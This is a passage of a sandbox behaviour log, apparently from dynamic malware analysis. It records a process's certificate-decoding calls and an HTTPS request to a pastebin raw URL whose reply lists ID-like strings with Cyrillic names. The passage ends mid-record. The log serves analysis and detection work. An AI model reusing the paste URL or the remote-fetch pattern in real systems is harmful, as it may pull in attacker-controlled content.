"06\\x04\\x10h\\xcbB\\xb05\\xeaw>R\\xefP\\xec\\xf5\\x0e\\xc5)\\x04 \\xa6\\x7f\\xe2\\xa9\\xaf\\x96|\\xb5\\xbf\\xfd\\xc9\\xeb\\xda\\x8f\\x1a\\xb5\\xea\\xbc\\xa2T\\xf1\\x03\\x96Rw\\xfdK\\xa3>'\\xa1\\x87\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1927 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\xbb\\x04\\x8f\\x1889_o\\xc3\\xa1\\xf3\\xd2\\xb7\\xe9vT\\x04 J\\xbb\\x05\\x94\\xd3\\x03\\xefpw\\x13\\x884\\xab1^\\x94\\x1e\\x960\\x93\\xe0[K\\x14\\xaf]\\xcbRw\\x12\\xc0\n\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1928 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\xd8\\xb5\\xfb6\\x84hb\\x02u\\xd1B\\xff\\xd2\\xaa\\xde7\\x04 p\\x8f\\x94en\\xadw\\x16k\\xe938[7\\xb7\\xd5\\x8f\\x7f\\x10\\xb2\\x8c\\x12ld\\xa7\\x86\\x1b\\xc6k\\xb6g\\xc4\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1929 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7da2", "parentcaller": "0x7ffee0bc7c77", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "0@\\x02\\x01\\x00\\x02\\x01\\x010806\\x04\\x10\\xbb\\x04\\x8f\\x1889_o\\xc3\\xa1\\xf3\\xd2\\xb7\\xe9vT\\x04 J\\xbb\\x05\\x94\\xd3\\x03\\xefpw\\x13\\x884\\xab1^\\x94\\x1e\\x960\\x93\\xe0[K\\x14\\xaf]\\xcbRw\\x12\\xc0\n\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1930 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7e31", "parentcaller": "0x7ffee0bc7c77", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "0806\\x04\\x10\\xbb\\x04\\x8f\\x1889_o\\xc3\\xa1\\xf3\\xd2\\xb7\\xe9vT\\x04 J\\xbb\\x05\\x94\\xd3\\x03\\xefpw\\x13\\x884\\xab1^\\x94\\x1e\\x960\\x93\\xe0[K\\x14\\xaf]\\xcbRw\\x12\\xc0\n\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1931 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\xbb\\x04\\x8f\\x1889_o\\xc3\\xa1\\xf3\\xd2\\xb7\\xe9vT\\x04 J\\xbb\\x05\\x94\\xd3\\x03\\xefpw\\x13\\x884\\xab1^\\x94\\x1e\\x960\\x93\\xe0[K\\x14\\xaf]\\xcbRw\\x12\\xc0\n\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1932 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7da2", "parentcaller": "0x7ffee0bc7c77", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "0@\\x02\\x01\\x00\\x02\\x01\\x010806\\x04\\x10\\x02\\x87v\\xeb\\x1e}\\xaeb\\xa5+\\xd5\n\\xa1[\\x9a]\\x04 \\x05\\xbe\\xf6\\xeb\\xdd\\xa8\\x0f=\\x15\\x07>K\\xde\\x9e\\x9f\\x9d\\xaau\\xf0\\xa5\\xa7p:c\\xaca<\\xf4>\\x14\\x08\\xc4\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1933 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7e31", "parentcaller": "0x7ffee0bc7c77", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "0806\\x04\\x10\\x02\\x87v\\xeb\\x1e}\\xaeb\\xa5+\\xd5\n\\xa1[\\x9a]\\x04 \\x05\\xbe\\xf6\\xeb\\xdd\\xa8\\x0f=\\x15\\x07>K\\xde\\x9e\\x9f\\x9d\\xaau\\xf0\\xa5\\xa7p:c\\xaca<\\xf4>\\x14\\x08\\xc4\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1934 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\x02\\x87v\\xeb\\x1e}\\xaeb\\xa5+\\xd5\n\\xa1[\\x9a]\\x04 \\x05\\xbe\\xf6\\xeb\\xdd\\xa8\\x0f=\\x15\\x07>K\\xde\\x9e\\x9f\\x9d\\xaau\\xf0\\xa5\\xa7p:c\\xaca<\\xf4>\\x14\\x08\\xc4\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1935 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7da2", "parentcaller": "0x7ffee0bc7c77", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "0\\x08\\x02\\x01\\x00\\x02\\x01\\x010\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1936 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7e31", "parentcaller": "0x7ffee0bc7c77", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "0\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1937 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7da2", "parentcaller": "0x7ffee0bc7c77", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "0\\x82\\x03\\x1a\\x02\\x01\\x00\\x02\\x01\\x010\\x82\\x03\\x1006\\x04\\x10V\\x8f\\x1c\\xb8\\xa3\t\\xda\\x17\\xf1\\x15\\x02\\xff\n\\xebp\\x80\\x04 \re(Gp#\\xc1o\\xb1\\x1e\\xe6\\xc3ZRPLND\\x1bY\\x19I\\x1f_5\\x9e\\xd5\\x0e\\xb3\\x05\\x9b\\x8a\\x05\\x0006\\x04\\x10h\\xcbB\\xb05\\xeaw>R\\xefP\\xec\\xf5\\x0e\\xc5)\\x04 \\xa6\\x7f\\xe2\\xa9\\xaf\\x96|\\xb5\\xbf\\xfd\\xc9\\xeb\\xda\\x8f\\x1a\\xb5\\xea\\xbc\\xa2T\\xf1\\x03\\x96Rw\\xfdK\\xa3>'\\xa1\\x87\\x05\\x0006\\x04\\x10\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04\\x04 \\xd4\\xc6z\\xd5\\x0e\\x19;\\x9du\\xa2!\\xd2`3\t\\x17\\x15t\\xaex,f\\xdb\\xa6D\\xa6\\x8a\\xffu\\xc0\\x7fP\\x05\\x0006\\x04\\x10\\x91\\xfa\\xd4\\x83\\xf1HH\\xa8\\xa6\\x9b\\x18\\xb8\\x05\\xcd\\xbb:\\x04 \\x064\\x8c\\xa9\r\\x7f\\xe0\\xf9\\x0cv\\xab\\x9d\\xe8\"\\xab\\xf5{\\x9a\\xb4B*\\xb4\\xf8>\\x9b\\x86\\x83\\xacQ\\xdf7\\x95\\x05\\x0006\\x04\\x10\\x98;\\x13&5\\xb7\\xe9\\x1d\\xee\\xf5Jg\\x80\\xc0" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1938 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7e31", "parentcaller": "0x7ffee0bc7c77", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "0\\x82\\x03\\x1006\\x04\\x10V\\x8f\\x1c\\xb8\\xa3\t\\xda\\x17\\xf1\\x15\\x02\\xff\n\\xebp\\x80\\x04 \re(Gp#\\xc1o\\xb1\\x1e\\xe6\\xc3ZRPLND\\x1bY\\x19I\\x1f_5\\x9e\\xd5\\x0e\\xb3\\x05\\x9b\\x8a\\x05\\x0006\\x04\\x10h\\xcbB\\xb05\\xeaw>R\\xefP\\xec\\xf5\\x0e\\xc5)\\x04 \\xa6\\x7f\\xe2\\xa9\\xaf\\x96|\\xb5\\xbf\\xfd\\xc9\\xeb\\xda\\x8f\\x1a\\xb5\\xea\\xbc\\xa2T\\xf1\\x03\\x96Rw\\xfdK\\xa3>'\\xa1\\x87\\x05\\x0006\\x04\\x10\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04\\x04 \\xd4\\xc6z\\xd5\\x0e\\x19;\\x9du\\xa2!\\xd2`3\t\\x17\\x15t\\xaex,f\\xdb\\xa6D\\xa6\\x8a\\xffu\\xc0\\x7fP\\x05\\x0006\\x04\\x10\\x91\\xfa\\xd4\\x83\\xf1HH\\xa8\\xa6\\x9b\\x18\\xb8\\x05\\xcd\\xbb:\\x04 \\x064\\x8c\\xa9\r\\x7f\\xe0\\xf9\\x0cv\\xab\\x9d\\xe8\"\\xab\\xf5{\\x9a\\xb4B*\\xb4\\xf8>\\x9b\\x86\\x83\\xacQ\\xdf7\\x95\\x05\\x0006\\x04\\x10\\x98;\\x13&5\\xb7\\xe9\\x1d\\xee\\xf5Jg\\x80\\xc0\\x92i\\x04 `\\xbd\\xedu\\xc5\\xfd" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1939 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10V\\x8f\\x1c\\xb8\\xa3\t\\xda\\x17\\xf1\\x15\\x02\\xff\n\\xebp\\x80\\x04 \re(Gp#\\xc1o\\xb1\\x1e\\xe6\\xc3ZRPLND\\x1bY\\x19I\\x1f_5\\x9e\\xd5\\x0e\\xb3\\x05\\x9b\\x8a\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1940 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10h\\xcbB\\xb05\\xeaw>R\\xefP\\xec\\xf5\\x0e\\xc5)\\x04 \\xa6\\x7f\\xe2\\xa9\\xaf\\x96|\\xb5\\xbf\\xfd\\xc9\\xeb\\xda\\x8f\\x1a\\xb5\\xea\\xbc\\xa2T\\xf1\\x03\\x96Rw\\xfdK\\xa3>'\\xa1\\x87\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1941 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04\\x04 \\xd4\\xc6z\\xd5\\x0e\\x19;\\x9du\\xa2!\\xd2`3\t\\x17\\x15t\\xaex,f\\xdb\\xa6D\\xa6\\x8a\\xffu\\xc0\\x7fP\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1942 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\x91\\xfa\\xd4\\x83\\xf1HH\\xa8\\xa6\\x9b\\x18\\xb8\\x05\\xcd\\xbb:\\x04 \\x064\\x8c\\xa9\r\\x7f\\xe0\\xf9\\x0cv\\xab\\x9d\\xe8\"\\xab\\xf5{\\x9a\\xb4B*\\xb4\\xf8>\\x9b\\x86\\x83\\xacQ\\xdf7\\x95\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1943 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\x98;\\x13&5\\xb7\\xe9\\x1d\\xee\\xf5Jg\\x80\\xc0\\x92i\\x04 `\\xbd\\xedu\\xc5\\xfd\\x11\\x90\\x10\\xd6\\x83/v\\xde\\xfc94s\\xd7\\xa0\\xced\\xfb\\xd6\\x8d\\xab\\xa2\\x9b\\xfd\\x0b/|\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1944 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\xa8#\\xb4\\xa2\\x01\\x80\\xbe\\xb4`\\xca\\xb9U\\xc2M~!\\x04 =\\xde2\\xff\\xc4p\\x9b\\xb1\\xa3\\xffv\\xd3TA\\xf4\\xae\\x7f\\xe0^\\xe2\\x8a\\xe5\\xd6\\x17\\xa7[\\xd3n\\xeek\\xf5\\xca\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1945 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\xa8\\x82z<\\xbd-\\x87\\xd7\\x83\\xb5\\x9b\\x80b\\xc8~\\x9a\\x04 %\\x88%;\\x9aAR$\\x14\\xad\\xc3\\xab\\xa2\\xf0\\xb8\\x17\\xbf;\\xaa\\x0cz\\x0c\\x19diO\\x7f^\\xff\\xc4\\xb9`\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1946 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\xadmo\\xf3\\x1b$\\x011Q\\xf2y\\xe2j\\x8c3$\\x04 \\xd61\\xb2F\\x02|\\xa8\\x8e\\x9b\\x03BO#\\x0c\\x9f53R\\xb4\\x9a_\\x9as\\x15Vm\\xc2\\xach\\xd0X\\x16\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1947 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\xbaO9r\\xe7\\xae\\xd9\\xdc\\xcd\\xc2\\x10\\xdbY\\xda\\x13\\xc9\\x04 \\xe5\\xd4\\x7f\\x02\\xf2t\\x97\\x81\\xc1\\x84\\xab<\\x0fT\\x9eqk\\xb21BJr\\x1f\\xec;\\xdf\\xa17G\\x9e\\x1e\\x15\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1948 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\xbb\\x04\\x8f\\x1889_o\\xc3\\xa1\\xf3\\xd2\\xb7\\xe9vT\\x04 J\\xbb\\x05\\x94\\xd3\\x03\\xefpw\\x13\\x884\\xab1^\\x94\\x1e\\x960\\x93\\xe0[K\\x14\\xaf]\\xcbRw\\x12\\xc0\n\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1949 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\xd0\\xfd<\\x9c8\r{e\\xe2k\\x9a?\\xed\\xd3\\x9b\\x8f\\x04 9\\xa4u\\x87\\x0b\\xf2\\xb4\\x8cR\\x03\\xa0\\x8e\\xa5\"y\\xbc\\xe7\\x1a\\xbb\\x8d>7\\xe0k\\x89\\x07\\xa2g\\xec\\xd7\\xdaj\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1950 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\xd6`0\\xcd\\xb7\\x92\\x86\\xc9\\xcb\\xee\\x93\\xc1O\\xa3\\x99\\xcc\\x04 E\\xbaB\\xfe\\xb2v\\x9a\\x95c\\xfaQ\\xcc'\\xdd\\x14\\x96\\xef\\xd0\\xe4\\xc5\\xd1\\x96\\x89\\x803\\x17\\x8c\\xc8u\\x8fP\\xca\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1951 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\xd8\\xb5\\xfb6\\x84hb\\x02u\\xd1B\\xff\\xd2\\xaa\\xde7\\x04 p\\x8f\\x94en\\xadw\\x16k\\xe938[7\\xb7\\xd5\\x8f\\x7f\\x10\\xb2\\x8c\\x12ld\\xa7\\x86\\x1b\\xc6k\\xb6g\\xc4\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1952 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7f0a", "parentcaller": "0x7ffee0bc7e76", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00010001" }, { "name": "Encoded", "value": "06\\x04\\x10\\xfaF\\xce|\\xbb\\x85\\xcf\\xb41\\x00u1:\t\\xee\\x05\\x04 H\\xa0:\\xf5\\x0b\\xc5\\xa1\\xf9q\\xc0\\xc1\\x93\\x8b\n\\xb2\\xd5\\x9bT\\x86\\x9e\\x18\\x01\\xf3x\\x1d^\\x1c\\xd2\\xf7\\xe3\\x93\\x91\\x05\\x00" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1953 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0bc7cee", "parentcaller": "0x7ffee0bca060", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00000001" }, { "name": "Encoded", "value": "\\x17\r180601232859Z" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1954 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffec77a116b", "parentcaller": "0x7ffec77a0c67", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 1955 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffedfaad443", "parentcaller": "0x7ffedfaabd57", "category": "network", "api": "SslEncryptPacket", "status": true, "return": "0x00000000", "arguments": [ { "name": "Buffer", "value": "GET /raw/04TKQkE1 HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nHost: pastebin.com\r\n\r\n" }, { "name": "SequenceNumber", "value": "1" }, { "name": "BufferSize", "value": "158" } ], "repeated": 0, "id": 1956 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffec77be76b", "parentcaller": "0x7ffec779d7bf", "category": "network", "api": "WSASend", "status": true, "return": "0x00000000", "arguments": [ { "name": "Socket", "value": "1192" }, { "name": "Buffer", "value": "\\x17\\x03\\x03\\x00\\xb6\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\xa1\\xab\\xf0\\x85\\xd3\\xfd\\xa7h\\xca2}\\xda\\x8c\\x85\\x87\\x14\\xa1G?\\x0e\\xda\\xae\\xcd(\\xa6\\xd1\\x9e\\xc0\\x0b\\x1b\\x98u\\xae\\xb1\\xa91J\\xc1L\\x01P\\x1c\\xf0V\\x7ff\\x14)\\xcb\\xadH\\xdf?\\\\xde\\xb3\\xac&\\xfaV\\x99g\\xc6\\xeaS\\xff\\xa7\\x1a\\xac\\xfe\\xf7z,\\x92\\x7f\\x01\\xc6\\xe7[\\x17\\xbe\\x90\\xa3+\\xfd\\xa1f\\x18\\xca\\x1b\\xdc\\xed9\\xd2>\\x9eo\\x00\\x86\\x04\\xea\\xae\\x91\\xe0B4\\xf4\\x85\\x83\\x8f-\\xdch\\xf2\\xbb\\xd2\\x0c\\xa392\\x17\\x8abv\\xd6n_\\x16Wc\\x8cz\\x9a\\xf1:\\xa4Md\\x1c5\\xa2\\xcb\\xe1(\\xf9\\x9a\\x8f;R\\x9a.cP|\\x02\\xd7\\x1f\\xd0\\x1a\\x15nG\\xc7\\xd2\\x0f\\xf1\\x8e?\\xf1Y\\xb2\\x02 \\xbc" } ], "repeated": 0, "id": 1957 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffec77bb648", "parentcaller": "0x7ffec779c7cd", "category": "network", "api": "WSARecv", "status": false, "return": "0xffffffffffffffff", "arguments": [ { "name": "socket", "value": "1192" } ], "repeated": 0, "id": 1958 }, { "timestamp": "2025-11-20 10:58:35,594", "thread_id": "1596", "caller": "0x7ffedfaacb7e", "parentcaller": "0x7ffedfaac903", "category": "network", "api": "SslDecryptPacket", "status": true, "return": "0x00000000", "arguments": [ { "name": "Buffer", "value": "HTTP/1.1 200 OK\r\nDate: Thu, 20 Nov 2025 13:58:43 GMT\r\nContent-Type: text/plain; charset=utf-8\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nServer: cloudflare\r\nx-frame-options: DENY\r\nx-content-type-options: nosniff\r\nx-xss-protection: 1;mode=block\r\nCache-Control: public, max-age=14400\r\ncf-cache-status: EXPIRED\r\nlast-modified: Thu, 20 Nov 2025 13:58:43 GMT\r\nVary: accept-encoding\r\nCF-RAY: 9a1876ba4d1c6cde-ARN\r\n\r\n90\r\n00330-80000-00000-AA481 - \\x44f\r\n00326-30000-00001-AA465 - \\x412\\x43b\\x430\\x434\r\n00330-80000-00000-AA051 - \\x42d\\x43b\\x44c\\x434\\x430\\x440\r\n00326-30000-00001-AA817 - \\x41a\\x438\\x440\\x438\\x43b\\x43b\r\n" }, { "name": "SequenceNumber", "value": "1" }, { "name": "BufferSize", "value": "570" } ], "repeated": 0, "id": 1959 }, { "timestamp": "2025-11-20 10:58:35,594", "thread_id": "1596", "caller": "0x7ffec77bb648", "parentcaller": "0x7ffec779c7cd", "category": "network", "api": "WSARecv", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1192" } ], "repeated": 0, "id": 1960 }, { "timestamp": "2025-11-20 10:58:35,594", "thread_id": "1596", "caller": "0x7ffedfaacb7e", "parentcaller": "0x7ffedfaac903", "category": "network", "api": "SslDecryptPacket", "status": true, "return": "0x00000000", "arguments": [ { "name": "Buffer", "value": "0\r\n\r\n" }, { "name": "SequenceNumber", "value": "2" }, { "name": "BufferSize", "value": "5" } ], "repeated": 0, "id": 1961 }, { "timestamp": "2025-11-20 10:58:35,594", "thread_id": "2188", "caller": "0x140084a74", "parentcaller": "0x1400a8304", "category": "network", "api": "WinHttpSendRequest", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x009769d0" }, { "name": "Headers", "value": "" }, { "name": "Optional", "value": "" } ], "repeated": 0, "id": 1962 }, { "timestamp": "2025-11-20 10:58:35,594", "thread_id": "2188", "caller": "0x140084a74", "parentcaller": "0x1400a8304", "category": "network", "api": "WinHttpReceiveResponse", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x009769d0" } ], "repeated": 2, "id": 1963 }, { "timestamp": "2025-11-20 10:58:35,594", "thread_id": "2188", "caller": "0x140084a74", "parentcaller": "0x1400a8304", "category": "network", "api": "WinHttpQueryHeaders", "status": false, "return": "0x00000000", "arguments": [ { "name": "InternetHandle", "value": "0x009769d0" } ], "repeated": 1, "id": 1964 }, { "timestamp": "2025-11-20 10:58:35,594", "thread_id": "2188", "caller": "0x140084a74", "parentcaller": "0x1400a8304", "category": "network", "api": "WSARecv", "status": false, "return": "0xffffffffffffffff", "arguments": [ { "name": "socket", "value": "1192" } ], "repeated": 0, "id": 1965 }, { "timestamp": "2025-11-20 10:58:35,594", "thread_id": "2188", "caller": "0x140084a74", "parentcaller": "0x1400a8304", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003f0" } ], "repeated": 0, "id": 1966 }, { "timestamp": "2025-11-20 10:58:35,594", "thread_id": "2188", "caller": "0x140084a74", "parentcaller": "0x1400a8304", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000044c" } ], "repeated": 1, "id": 1967 }, { "timestamp": "2025-11-20 10:58:35,594", "thread_id": "2188", "caller": "0x140084a74", "parentcaller": "0x1400a8304", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003f0" } ], "repeated": 1, "id": 1968 }, { "timestamp": "2025-11-20 10:58:35,594", "thread_id": "2188", "caller": "0x140084a74", "parentcaller": "0x1400a8304", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000044c" } ], "repeated": 0, "id": 1969 }, { "timestamp": "2025-11-20 10:58:35,594", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": 